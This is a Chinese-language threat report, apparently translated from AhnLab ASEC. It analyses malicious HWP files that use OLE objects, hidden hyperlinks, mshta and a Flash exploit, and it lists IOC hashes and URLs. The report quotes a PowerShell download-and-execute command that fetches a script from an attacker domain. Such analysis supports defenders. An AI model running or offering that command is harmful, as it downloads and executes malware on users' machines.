利用 OLE 对象漏洞的 HWP 恶意文件浮出水面
ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash 漏洞(CVE-2018-15982),需要用户谨慎对待。
打开 HWP 文件时会在 %TEMP%
文件夹中生成如下文件。攻击者不直接使用 powershell.exe 和 mshta.exe 可能是为了要规避检测。
攻击者使用白色矩形图片覆盖插入的 OLE 对象,如下所示:
【插入文档的 OLE 对象】
【文件信息】
从文件内容来看,文件中带有个人资料表格等标题。与过去类似,攻击者在每个格中通过空格与超链接来执行恶意文件。
【嵌入超链接】
【超链接详情】
当用户单击字段填写表格时,就会执行嵌入的超链接。超链接以相对路径构建,因此 HWP 文件必须处在特定的位置才能触发恶意行为。
通过mshta.exe来连接恶意URL(%tmp%\hwp.exe“hxxp://yukkimmo.sportsontheweb[.]net/hw.php”
),可以根据攻击者的意图来执行各种恶意命令:
【传输的命令】
另一个值得一提的恶意命令是:hword.exe -nop -c \”iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')
。
【脚本代码】
脚本具备两项功能:通过 hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt下载其他 PE 文件,保存在 %temp% 文件夹中并通过 Process Hollowing 执行。
【进程树】
生成的文件 1234dd.tmp被重命名为 3dd21.tmp。当用户再次打开 HWP 文件时,会自动打开嵌入了 Flash 对象的 HWP 文件(1234dd.tmp),该文件与前述提到的文件也是类似的。
【文件信息】
后续的 HWP 文件包含一个 Flash 对象,其中嵌入了某个 URL。
【嵌入 Flash 对象】
【对象属性】
该 URL早在 2020 年就被检测为恶意:hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php
另一个 HWP 文件,伪装成用于支付服务费的个人数据收集表格。其中也嵌入了 OLE 对象,执行的文件基本类似。
【识别额外的 HWP 文件】
【文件信息】
表格中依旧嵌入了超链接,用户单击时就会触发 LNK 文件执行命令(hxxp://yukkimmo.sportsontheweb[.]net/hw.php),与前述文章类似。
IOC
76f8ccf8313af617df28e8e1f7f39f73 9a13173df687549cfce3b36d8a4e20d3 804d12b116bb40282fbf245db885c093 caa923803152dd9e6b5bf7f6b816ae98 2f4ed70149da3825be16b6057bf7b8df 65993d1cb0d1d7ce218fb267ee36f7c1 330f2f1eb6dc3d753b756a27694ef89b hxxp://yukkimmo.sportsontheweb.net/hw.php hxxp://yukkimmo. sportsontheweb[.]net/h.txt hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php
参考来源:
https://asec.ahnlab.com/en/38479/
相关文章
- ctf-web:文件上传漏洞和文件解析漏洞
- 心血漏洞(OpenSSL升级)[通俗易懂]
- ewebeditor php漏洞,ewebeditor for php任意文件上传漏洞「建议收藏」
- 一文了解文件包含漏洞
- 一文了解XSS漏洞和常见payload
- Redis未授权访问漏洞复现
- CVE-2022-44268 ImageMagick任意文件读取漏洞
- CVE-2017-9805 S2-052远程代码执行漏洞
- PHP 文件上传漏洞代码
- CVE-2017-10271 Weblogic远程代码执行漏洞
- phpmailer RCE漏洞分析
- 顶会论文解读|AEM:Linux内核漏洞跨版本利用可行性评估
- 新的Windows搜索零日漏洞可被远程托管恶意软件利用
- FreeBuf周报 | 沃尔沃零售商泄露敏感文件;OpenAI推出漏洞赏金计划
- 谷歌发布安全消息称有黑客正在野外积极利用安卓系统的4枚零日漏洞
- iOS的奇怪漏洞会导致iPhone必须重置 恶作剧者可能会利用漏洞进行破坏
- Android调试器爆漏洞,可获取设备内存数据
- 微软发布令牌漏洞公告:可绕过 Chromium 沙盒执行任意代码
- 卡巴斯基实验室提高其漏洞奖励金额至100,000美元
- 对众多知名公司造成影响的Oracle Responsys本地文件包含漏洞
- PHP本地文件包含漏洞环境搭建与利用
- .NET Remoting 远程代码执行漏洞探究
- MySQL数据库:面对漏洞的警惕(mysql数据库漏洞)
- MSSQL注入漏洞防范之文件上传安全(mssql注入上传)
- 比雅虎泄露更严重!超85万台思科设备仍受“零日漏洞”影响
- 【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件
- php伪造本地文件包含漏洞的代码